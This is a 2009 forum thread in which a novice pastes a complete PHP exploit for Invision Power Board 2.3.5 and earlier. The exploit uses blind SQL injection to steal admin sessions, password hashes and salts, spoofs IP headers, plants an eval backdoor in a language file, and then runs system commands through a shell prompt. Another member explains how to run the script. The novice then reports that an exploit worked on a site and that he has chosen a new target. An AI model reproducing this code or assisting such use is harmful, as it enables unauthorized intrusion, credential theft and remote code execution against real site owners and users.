Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
May 22, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 453
Members: 0
Total: 453
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> NEED HELP (having noob error) :S
Post new topic  Reply to topic View previous topic :: View next topic 
NEED HELP (having noob error) :S
PostPosted: Sat Jun 20, 2009 6:57 pm Reply with quote
tomzor
Regular user
Regular user
 
Joined: Jun 20, 2009
Posts: 18
Location: unknown??




well i am a totall noob do this...

my was told that is sould get activeperl
so that is what i did.. got it from here: [url]http://www.activestate.com/activeperl/
[/url]

But every time when i try to open a exploit i gives this error:
can't exec /user/bin/php at C:\Perl\bin\attack.pl

well i was thinking my perl doesn't have the function off using a php script...
so what should i do?
go get apache, and run the php script there?
or did i make a noob mistake?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Jun 20, 2009 7:00 pm Reply with quote
earthquaker
Advanced user
Advanced user
 
Joined: Jun 02, 2008
Posts: 111
Location: q8




may u show us the execute command u r using
View user's profile Send private message
PostPosted: Sat Jun 20, 2009 7:04 pm Reply with quote
tomzor
Regular user
Regular user
 
Joined: Jun 20, 2009
Posts: 18
Location: unknown??




well sure you can Wink

here you go:

do you have any idea what the problem could be then?[/img]
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Jun 20, 2009 7:09 pm Reply with quote
earthquaker
Advanced user
Advanced user
 
Joined: Jun 02, 2008
Posts: 111
Location: q8




is the attack.pl located at c:\perl\bin?
and what does php have to do in a .pl ?
and please show the content of attack.pl incase there is error in script
View user's profile Send private message
PostPosted: Sat Jun 20, 2009 7:12 pm Reply with quote
tomzor
Regular user
Regular user
 
Joined: Jun 20, 2009
Posts: 18
Location: unknown??




and yea it is at the C:\perl\bin

this is in the attack.pl file:

Code:
#!/usr/bin/php -q

<?php

# This file requires the PhpSploit class.

# If you want to use this class, the latest

# version can be downloaded from acid-root.new.fr.

##################################################

error_reporting(E_ALL ^ E_NOTICE);

require('phpsploitclass.php');

# yeah ... it rox (:

class ipb_spl

{

var $web;

function main()

{

$this->mhead();

# Gimme your args

$this->p_attack = $this->get_p('attack', true);

$this->p_prox = $this->get_p('proxhost');

$this->p_proxa = $this->get_p('proxauth');

$this->init_global();

# Proxy params

if( $this->p_prox )

{

$this->web->proxy($this->p_prox);

if( $this->p_proxa )

$this->web->proxyauth($this->p_proxa);

}

# Where do we go ?

switch( $this->p_attack )

{

case 1: $this->code_exec(); break;

case 2; $this->bf_sql_pwd(); break;

case 3: $this->bf_usr_pwd(); break;

default: $this->usage();

}

return;

}

function code_exec($loop=1)

{

# First loop

if( $loop == 1 )

{

$this->set_sql_param();

$this->set_sql_focus();

$this->p_acp = $this->get_p('acp');

# ACP path

if( !$this->p_acp )

{

# If the user changed the ACP directory, we can

# find it (if the "Remove ACP Link" option was not

# applied) by log in as an Admin, and then click

# on "Admin CP". This can be done with a user

# but I didn't implemented that;)

$this->msg('Using default ACP path: admin', 1);

$this->p_acp = 'admin';

}

else

$this->msg('Using ACP path "'.$this->p_acp.'"', 1);

# Init client headers:

# Only if we have the same IP as the targeted user (not admin),

# it resets session datas, so we try to spoof our

# IP as a random one in order to keep user's session datas while

# we bruteforce SQL fields.

$this->bypass_matches();

# Remove expired sessions ( time() - 60*60*2 = > 2 hours )

$this->web->get($this->p_url.$this->p_acp.'/index.php?');

$this->msg('Removed all out of date admin sessions', 1);

# Cookie prefix

$this->get_cprefix();

}

# Admin session ?

$this->msg('Trying to find an admin session id', 0);

# Got one :]

if( $this->get_admin_sess() )

{

$this->s_admin = true;

$this->s_sess = $this->data['a_sess_id'];

$this->a_url = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess;

}

# Nothing special

else

{

$this->s_admin = false;

$this->msg('No admin session id found', -1);

}

# User session ?

if( !$this->s_sess )

{

$this->msg('Trying to find a user session id', 0);

# Yep

if( $this->get_user_sess() )

$this->s_sess = $this->data['u_sess_id'];

# F0ck

else

{

$this->msg('No user session id found', -1);

$this->msg('Admin session > 2 hours or user logged out', 0);

$this->msg('Keeping trying until the user connects', 0);

$this->msg('Entering loop #'.$loop.' ...', 0);

$this->code_exec(++$loop);

}

}

$this->msg('Getting security options', 0);

# Security options

$this->get_sec_options();

# IP filter ?

if( $this->conf['ip'] === '1' )

{

$this->s_bypass = true;

$this->msg('IP filter option is turned on', 0);

# Spoofing protection ?

if( !$this->conf['xforward'] )

{

# Assuming our IP isn't the same etc..

$this->msg('Can\'t bypass the IP filter', -1);

exit(1);

}

# X-Forwarded-For / Client-IP /

# Proxy-User / X-Cluster-Client-IP

else

{

$this->msg('Cool, we can spoof our IP (Client-IP)', 1);

if( $this->s_admin )

{

$this->msg('Trying to find admin\'s last IP', 0);

# Admin IP found

$this->get_admin_ip();

$this->s_ip = $this->data['a_ip_addr'];

}

else

{

$this->s_admin = false;

$this->msg('Trying to find user\'s last used IP', 0);

# User IP found

$this->get_user_ip();

$this->s_ip = $this->data['u_ip_addr'];

}

# Nothing found

if( !$this->s_ip )

{

# Ahah (:

$this->msg('No IP found for this user', -1);

$this->give_hope();

}

# Got one !

else

$this->msg('Ok, using IP '.$this->s_ip, 1);

}

}

# User-Agent filter ?

if( $this->conf['browser'] === '1' && !$this->s_admin )

{

$this->s_bypass = true;

$this->msg('Trying to find a valid user-agent', 0);

# Good

if( $this->get_user_agent() )

{

$this->msg('Ok, using user-agent '.substr($this->data['u_agent'], 0, 10).'...', 1);

$this->s_agent = $this->data['u_agent'];

}

# WTF :!

else

{

$this->msg('No user-agent found for this user', -1);

$this->msg('Maybe the browser didn\'t send this header', 0);

$this->s_agent = '';

}

}

# Cool !?

if( !$this->s_bypass )

$this->msg('Cool, nothing to bypass', 1);

$this->msg('Trying to log in', 0);

# Owned =]

if( $this->is_logged() )

{

# PHP code

if( $this->s_admin )

{

$this->msg('Logged in with an admin session', 1);

$this->exec_code();

}

# Normal user ?

else

{

$this->msg('Logged in with a user session', 1);

$this->msg('You can log in using the cookie session_id', 1);

if( $this->s_ip !== $this->def_ip )

$this->msg('Set the Client-IP header to: '.$this->s_ip, 1);

if( $this->s_agent )

$this->msg('Set the User-Agent header to: '.$this->s_agent, 1);

exit(0);

}

}

else

{

# Even if the admin logged out .. the admin session

# is still valid;)

$this->msg('Can\'t log in, the session has expired ?!', -1);

$this->give_hope();

}

return;

}

function bf_sql_pwd()

{

$this->p_ip = $this->get_p('ip', true);

$this->p_dict = $this->get_p('dict', true);

$this->p_sql_u = $this->get_p('sqlusr');

$this->p_url = $this->get_p('url');

$this->p_uname = $this->get_p('uname');

$this->p_pwd = $this->get_p('pwd');

// or

$this->p_uid = $this->get_p('uid');

$this->p_hash = $this->get_p('passhash');

$this->p_shold = $this->get_p('stronghold');

if( $this->p_uname && $this->p_pwd && $this->p_url )

{

$this->get_cprefix();

$this->msg('Trying to get some cookies', 0);

$g_dat = 'index.php?act=Login&CODE=01&CookieDate=1';

$p_dat = 'UserName='.$this->p_uname.'&PassWord='.$this->p_pwd.'&x=0&y=0';

$this->web->post($this->p_url.$g_dat, $p_dat);

$this->p_uid = $this->web->cookie[$this->s_cprefix.'member_id'];

$this->p_hash = $this->web->cookie[$this->s_cprefix.'pass_hash'];

$this->p_shold = $this->web->cookie[$this->s_cprefix.'ipb_stronghold'];

}

elseif( !$this->p_uid || !$this->p_hash || !$this->p_shold )

$this->usage();

if( !$this->p_uid || !$this->p_hash || !$this->p_shold )

{

$this->msg('Can\'t get cookies', -1);

$this->msg('You should try with other parameters', -1);

exit(1);

}

$this->msg('Ok, using cookies:', 1);

$this->msg('member_id='.$this->p_uid, 1);

$this->msg('pass_hash='.$this->p_hash, 1);

$this->msg('ipb_stronghold='.$this->p_shold, 1);

if( !$this->p_sql_u )

{

$this->set_sql_param();

$this->msg('Trying to get the current sql user', 0);

if( !$this->get_sql_user() )

{

$this->msg('Can\'t get the sql user', -1);

$this->msg('If you know the sql user, use -sqlusr', -1);

exit(1);

}

else

$this->p_sql_u = $this->data['sql_user'];

}

$this->msg('Ok, using sql user '.$this->p_sql_u, 1);

$dico_c = file($this->p_dict);

$ip_a = explode('.', $this->p_ip);

$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);

$this->msg('You should take a drink ...', 0);

foreach( $dico_c as $line )

{

$md5 = md5(trim($line).$this->p_sql_u);

$md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5;

$md5 = md5($md5);

if( $this->p_shold === $md5 )

{

$this->msg('Found something cool =]', 1);

$this->msg('SQL password: '.$line, 1);

exit(1);

}

}

$this->msg('End of the wordlist, password not found', -1);

return;

}

function bf_usr_pwd()

{

$this->p_dict = $this->get_p('dict', true);

$this->p_hash = $this->get_p('passhash');

$this->p_salt = $this->get_p('salt');

if( !$this->p_hash || !$this->p_salt )

{

$this->set_sql_param();

$this->set_sql_focus();

}

if( !$this->p_hash )

{

$this->msg('Trying to get the password hash', 0);

if( !$this->get_pass_hash() )

{

$this->msg('Can\'t get the password hash', -1);

exit(1);

}

else

$this->p_hash = $this->data['pass_hash'];

}

$this->msg('Ok, using hash '.$this->p_hash, 1);

if( !$this->p_salt )

{

$this->msg('Trying to get the password salt', 0);

if( !$this->get_pass_salt() )

{

$this->msg('Can\'t get the password salt', -1);

exit(1);

}

else

$this->p_salt = $this->data['pass_salt'];

}

$this->msg('Ok, using salt '.$this->p_salt, 1);

$dico_c = file($this->p_dict);

$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);

$this->msg('You should take a drink ...', 0);

foreach( $dico_c as $line )

{

if( $this->p_hash === md5(md5($this->p_salt).md5(trim($line))) )

{

$this->msg('Found something cool =]', 1);

$this->msg('User password: '.$line, 1);

exit(1);

}

}

$this->msg('End of the wordlist, password not found', -1);

return;

}

function set_sql_param()

{

$this->p_url = $this->get_p('url', true);

$this->p_pre = $this->get_p('prefix');

# Table prefix

if( !$this->p_pre )

{

# Default table prefix if not precised

$this->msg('Using default table prefix: ibf_', 1);

$this->p_pre = 'ibf_';

}

else

$this->msg('Using table prefix '.$this->p_pre, 1);

}

function set_sql_focus()

{

$this->p_uname = $this->get_p('uname');

$this->p_uid = $this->get_p('uid');

if( $this->p_uname )

$this->msg('Using targeted username '.$this->p_uname, 1);

elseif( $this->p_uid )

$this->msg('Using targeted user id '.$this->p_uid, 1);

# Target

if( !($this->p_uname || $this->p_uid) )

{

# Default uid if not precised

$this->msg('Using default user id: 1', 1);

$this->p_uid = 1;

}

# Focus on ?

if( $this->p_uname )

$this->t_on = 'members_l_username=\''.addslashes($this->p_uname).'\'';

else

$this->t_on = 'id='.(int)$this->p_uid;

return;

}

function exec_code()

{

$this->write_code();

while( $this->cmd_prompt() )

{

$this->web->addheader('My-Code', $this->cmd);

$this->web->get($this->p_url);

print "\n".$this->get_answer();

}

exit(0);

}

function get_answer()

{

$res_a = explode($this->res_sep, $this->web->getcontent());

if( !$res_a[1] )

return 'No result to retrieve';

else

return $res_a[1];

}

function cmd_prompt()

{

$this->cmd = $this->msg('root@ipb: ', 1, 1, 0, true);

if( !ereg('^(quit|exit)$', $this->cmd) )

{

$this->cmd = base64_encode($this->cmd);

$this->cmd = str_replace('%CMD%', $this->cmd, $this->php_send);

return TRUE;

}

else

return FALSE;

}

function write_code()

{

# Gimme the language ID

$this->get_def_lang();

# Current lang settings

$p_dat =

'code=edit2&act=lang&id='.$this->g_lid.'&section'.

'=lookandfeel&lang_file=lang_boards.php';

$this->web->post($this->a_url, $p_dat);

# We collect each variable name / value

if( preg_match_all($this->reg_lvar, $this->web->getcontent(), $l_vars) )

{

# POST data

$p_dat =

'code=doedit&act=lang&id='.$this->g_lid.

'&lang_file=lang_boards.php&section=lo'.

'okandfeel&';

# &Name=Value

for( $i=0; $i<count($l_vars[0]); $i++ )

{

$p_dat .=

'&XX_'.$l_vars[1][$i].'='.urlencode($l_vars[2][$i]);

# We write our PHP code in the first variable

if( $i == 0 )

$p_dat .= $this->php_write;

}

# Go on

$this->web->post($this->a_url, $p_dat);

$this->msg('PHP code written', 1);

}

else

{

# WTF :!

$this->msg('Can\'t find block variables', 0);

exit(1);

}

return;

}

function get_def_lang()

{

$this->msg('Trying to get the set language id', 0);

$this->web->get($this->a_url.'&section=lookandfeel&act=lang');

if( preg_match($this->reg_lang, $this->web->getcontent(), $lids) )

{

$this->g_lid = $lids[1];

$this->msg('Using language id '.$this->g_lid, 1);

}

else

{

$this->msg('Can\'t get the default language id', -1);

exit(1);

}

return;

}

function is_logged()

{

$this->bypass_matches();

# User session ok ?

if( !$this->s_admin )

{

$match = 'act=Login&CODE=03';

$this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess);

$this->web->get($this->p_url);

}

# Admin session ok ?

else

{

$match = '&section=';

$this->web->get($this->a_url);

}

if( preg_match("/$match/i", $this->web->getcontent()) )

return true;

else

return false;

}

function bypass_matches()

{

# match_browser

$this->web->agent($this->s_agent);

# match_ipaddress

$this->web->addheader('Client-IP', $this->s_ip);

return;

}

function get_cprefix()

{

$this->msg('Trying to get the cookie prefix', 0);

# Set-Cookie: session_id=...; path=/

$this->web->get($this->p_url);

$this->s_cprefix = '';

if( $this->web->cookie )

{

foreach( $this->web->cookie as $name => $value)

{

if( preg_match($this->reg_cpre, $name, $cmatches) )

{

$this->s_cprefix = $cmatches[1];

break;

}

}

}

if( !$this->s_cprefix )

$this->msg('No cookie prefix set', 1);

else

$this->msg('Using cookie prefix '.$this->s_cprefix, 1);

return;

}

function get_sec_options()

{

# If no value, take the default one

$this->get_conf('t.conf_value');

$this->get_conf('t.conf_default');

return;

}

function get_conf($field)

{

$this->init_sql();

$this->t_table = 'conf_settings';

$this->t_field = $field;

$this->t_char = $this->chr_num;

$this->t_add_0 = "AND t.conf_key='match_browser'";

if( $this->conf['browser'] === '' )

$this->conf['browser'] = $this->bf_inj();

$this->t_add_0 = "AND t.conf_key='match_ipaddress'";

if( $this->conf['ip'] === '' )

$this->conf['ip'] = $this->bf_inj();

$this->t_add_0 = "AND t.conf_key='xforward_matching'";

if( $this->conf['xforward'] === '' )

$this->conf['xforward'] = $this->bf_inj();

return;

}

function get_login_key()

{

$this->init_sql();

$this->t_key = 'login_key';

$this->t_table = 'members';

$this->t_field = 't.member_login_key';

$this->t_join = 't.id=m.id';

$this->t_char = $this->chr_md5;

$this->data['login_key'] = $this->bf_inj();

return $this->key_val;

}

function get_sql_user()

{

$this->init_sql();

$this->t_key = 'user()';

$this->t_table = 'members';

$this->t_field = 'user()';

$this->t_char = $this->chr_all;

$this->t_end = '@';

$this->data['sql_user'] = $this->bf_inj();

return $this->key_val;

}

function get_pass_hash()

{

$this->init_sql();

$this->t_key = 'pass_hash';

$this->t_table = 'members_converge';

$this->t_field = 't.converge_pass_hash';

$this->t_join = 't.converge_email=m.email';

$this->t_char = $this->chr_md5;

$this->data['pass_hash'] = $this->bf_inj();

return $this->key_val;

}

function get_pass_salt()

{

$this->init_sql();

$this->t_key = 'pass_salt';

$this->t_table = 'members_converge';

$this->t_field = 't.converge_pass_salt';

$this->t_join = 't.converge_email=m.email';

$this->t_char = $this->chr_all;

$this->data['pass_salt'] = $this->bf_inj();

return $this->key_val;

}

function get_admin_sess()

{

$this->init_sql();

$this->t_key = 'admin_sid';

$this->t_table = 'admin_sessions';

$this->t_field = 't.session_id';

$this->t_join = 't.session_member_id=m.id';

$this->t_sel = 't.session_log_in_time';

$this->t_char = $this->chr_md5;

$this->data['a_sess_id'] = $this->bf_inj();

return $this->key_val;

}

function get_admin_ip()

{

$this->init_sql();

$this->t_key = 'admin_ip';

$this->t_table = 'admin_sessions';

$this->t_field = 't.session_ip_address';

$this->t_join = 't.session_member_id=m.id';

$this->t_sel = 't.session_log_in_time';

$this->t_char = $this->chr_ip;

$this->data['a_ip_addr'] = $this->bf_inj();

return $this->key_val;

}

function get_admin_pwd()

{

$this->init_sql();

$this->t_key = 'admin_pwd';

$this->t_table = 'admin_login_logs';

$this->t_field = 't.admin_post_details';

$this->t_join = 't.admin_username=m.members_l_username';

$this->t_sel = 't.admin_id';

$this->t_end = '"';

$this->t_bchar = -4; # ";}}

$this->t_char = $this->chr_all;

$this->data['a_pwd_like']= $this->bf_inj();

return $this->key_val;

}

function get_user_sess()

{

$this->init_sql();

$this->t_key = 'user_sid';

$this->t_table = 'sessions';

$this->t_field = 't.id';

$this->t_join = 't.member_id=m.id';

$this->t_sel = 't.running_time';

$this->t_char = $this->chr_md5;

$this->data['u_sess_id'] = $this->bf_inj();

return $this->key_val;

}

function get_user_ip()

{

$this->init_sql();

$this->t_key = 'user_ip';

$this->t_table = 'sessions';

$this->t_field = 't.ip_address';

$this->t_join = 't.member_id=m.id';

$this->t_sel = 't.running_time';

$this->t_char = $this->chr_ip;

$this->data['u_ip_addr'] = $this->bf_inj();

return $this->key_val;

}

function get_user_agent()

{

$this->init_sql();

$this->t_key = 'user_agent';

$this->t_table = 'sessions';

$this->t_field = 't.browser';

$this->t_join = 't.member_id=m.id';

$this->t_sel = 't.running_time';

$this->t_char = $this->chr_all;

$this->data['u_agent'] = $this->bf_inj();

return $this->key_val;

}

function init_sql()

{

# SQL Injection params

$this->t_end = null;

$this->t_add_0 = '';

$this->t_add_1 = '';

$this->t_sel = '1';

$this->t_bchar = 0;

$this->t_join = '';

$this->t_key = '';

$this->t_add_1 = 'ORDER BY id DESC LIMIT 1';

return;

}

function init_global()

{

# Charsets

$this->chr_spe = str_split(' :/;*(-.!,?*%$^=+})]^_\\`|[\'{#~&"@');

$this->chr_num = range(0, 9);

$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );

$this->chr_ip = array_merge( $this->chr_num, array('.') );

$this->chr_all = array_merge( $this->chr_num, range('a', 'z') );

$this->chr_all = array_merge( range('A', 'Z'), $this->chr_all, $this->chr_spe );

# SQL Injection

$this->def_param = 'index.php?s=&act=xmlout&do=check-display-name&name=%rep_inj%';

$this->def_inj = "' OR 1=\"'\" UNION %rep_req% OR 1=\"'\" %rep_add% #";

# Results

$this->data = array();

$this->conf = array('ip' => '', 'browser' => '', 'xforward' => '');

# Misc

$this->stat = array(-1 => '-', 0 => '/', 1 => '+');

$this->s_bypass = false;

$this->res_sep = md5(rand());

$this->def_ip = rand(0,255).'.'.rand(0,255).'.'.rand(0,255).'.'.rand(0,255);

# PHP Code

$this->php_write = '${${@eval($_SERVER[HTTP_MY_CODE])}}';

$this->php_send = "print('$this->res_sep');@system(base64_decode('%CMD%'));";

$this->php_send .= "print('$this->res_sep');exit(0);";

# Regex

$this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';

$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i";

$this->reg_cpre = '#^(.*)session_id$#';

# $this->reg_acp = '#<a href="(.*)"[\x20]+target="_blank"#i';

# Default client headers

$this->s_agent = 'Mozilla Firefox';

$this->s_ip = $this->def_ip;

return;

}

function bf_inj()

{

$this->sub_chr = $this->t_bchar;

$this->key_val = '';

if( !empty($this->t_key) )

$this->msg('', 0);

while( true )

{

if( $this->t_bchar < 0 )

$this->sub_chr--;

else

$this->sub_chr++;

# 0-9a-f

for( $j=0;$j<=count($this->t_char);$j++ )

{

# That one ?

$chr = $this->t_char[$j];

# Latest char ?

if( $j === count($this->t_char) )

$chr = $this->t_end;

# Ascii num

$asc = ord($chr);

# Screen bug

if( !empty($this->t_key) )

{

$msg = $this->t_key.'='.$this->key_val;

$msg .= ($chr === $this->t_end ? "\x20" : $chr);

$this->msg($msg, 0, 1, 1);

}

# Focus on the target ?

if( !empty($this->t_join) )

{

$inj =

'SELECT 1,'.$this->t_sel.' FROM '.$this->p_pre.$this->t_table.

' t, '.$this->p_pre.'members m WHERE '.$this->t_join.

' AND m.'.$this->t_on.' AND ASCII(SUBSTR('.$this->t_field.

','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;

}

else

{

$inj =

'SELECT 1,'.$this->t_sel.' FROM '.$this->p_pre.$this->t_table.

' t WHERE ASCII(SUBSTR('.$this->t_field.','.$this->sub_chr.

',1))='.$asc.' '.$this->t_add_0;

}

# SQL Injection via rawurldecode()

$inj = str_replace('%rep_req%', $inj, $this->def_inj);

$inj = str_replace('%rep_add%', $this->t_add_1, $inj);

$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);

# Params

$inj = str_replace('%rep_inj%', $inj, $this->def_param);

$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);

$this->web->get($this->p_url.$inj);

# Ok !?

if( !strstr($this->web->getcontent(), 'notfound') )

{

if( $chr !== $this->t_end )

{

$this->key_val .= $chr;

break;

}

}

# End

if( $chr === $this->t_end )

{

# Reverse

if( $this->t_bchar < 0 )

$this->key_val = strrev($this->key_val);

if( !empty($this->t_key) )

$this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);

return $this->key_val;

}

}

}

}

function get_p($p, $exit=false)

{

global $argv;

foreach( $argv as $key => $value )

{

if( $value === '-'.$p )

{

if( isset($argv[$key+1]) && !empty($argv[$key+1]) )

{

return $argv[$key+1];

}

else

{

if( $exit )

$this->usage();

return true;

}

}

}

if( $exit )

$this->usage();

return false;

}

function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)

{

if( $ndel ) $type = "\r";

else $type = "\n";

# wtf (:

print

(

$type.str_repeat("\x20", $nspace).

$this->stat[$nstatus]."\x20".$msg

);

if( $ask )

return trim(fgets(STDIN));

}

function give_hope()

{

$this->msg('You should try with another user or try another time', -1);

exit(1);

}

function mhead()

{

# Advisory: http://acid-root.new.fr/?0:18

print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";

print "\n ------------------------------------------------------";

print "\n\n About:";

print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";

print "\n http://acid-root.new.fr/";

print "\n #acidroot (at) irc.worldnet (dot) net [email concealed]";

print "\n\n\n Attack(s):\n";

return;

}

function usage()

{

print "\n -attack <int_choice> <params> [options]\n\n";

print " 1 - PHP code execution\n\n";

print " -url IPB url with ending slash\n\n";

print " -uname targeted username\n";

print " -uid OR the targeted user id (def: 1)\n\n";

print " -prefix sql table prefix (def: ibf_)\n";

print " -acp admin control panel path (def: admin)\n\n\n";

print " 2 - Insecure SQL password usage\n\n";

print " -ip your current IP\n";

print " -dict a wordlist file\n\n";

print " -url IPB url with ending slash\n";

print " -uname a valid member username\n";

print " -pwd the associated password\n\n";

print " -uid OR the targeted member id\n";

print " -passhash the passhash cookie value\n";

print " -stronghold the stronghold cookie value\n\n";

print " -sqlusr you can precise the sql user\n";

print " -prefix sql table prefix (def: ibf_)\n\n\n";

print " 3 - Password bruteforcer\n\n";

print " -dict a wordlist file\n\n";

print " -url IPB url with ending slash\n";

print " -uname targeted username\n";

print " -uid OR the targeted user id (def: 1)\n";

print " -prefix sql table prefix (def: ibf_)\n\n";

print " -passhash OR the passhash value\n";

print " -salt the salt value\n\n\n";

print " Optional: \n\n";

print " -proxhost <ip> if you wanna use a proxy\n";

print " -proxauth <usr:pwd> proxy with authentication\n";

exit(1);

}

}

$web = new phpsploit;

$web->cookiejar(1);

$web->agent('Mozilla Firefox');

$ipb = new ipb_spl;

$ipb->web =& $web;

$ipb->main();

?>


this was a standaart script...
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Jun 20, 2009 7:15 pm Reply with quote
earthquaker
Advanced user
Advanced user
 
Joined: Jun 02, 2008
Posts: 111
Location: q8




1- rename the file to attack.php instead of attack.pl

cmd command line : ren attack.pl attack.php

2- download php from htt://php.net

3- run it from the cmd :
cmd command line : php attack.php



and download that php class from the website written in the attack.php file
View user's profile Send private message
PostPosted: Sat Jun 20, 2009 7:39 pm Reply with quote
tomzor
Regular user
Regular user
 
Joined: Jun 20, 2009
Posts: 18
Location: unknown??




well okay i have downloaded php
but i wanted to get apache now does anybody happen to have a download link for me?
cause thay will save me alot of trouble Smile
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Sat Jun 20, 2009 7:47 pm Reply with quote
earthquaker
Advanced user
Advanced user
 
Joined: Jun 02, 2008
Posts: 111
Location: q8




http://lmgtfy.com/?q=wamp
View user's profile Send private message
PostPosted: Sat Jun 20, 2009 8:08 pm Reply with quote
tomzor
Regular user
Regular user
 
Joined: Jun 20, 2009
Posts: 18
Location: unknown??




okay got it up and running tried a other exploit on a site worked...

but now i have targed one, but i don't have the phpspliotclass

is this one right?: http://securityvulns.ru/files/phpsploitclass.php

or do you have a other standart expliot injectoin?
View user's profile Send private message Visit poster's website MSN Messenger
NEED HELP (having noob error) :S
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.188 Seconds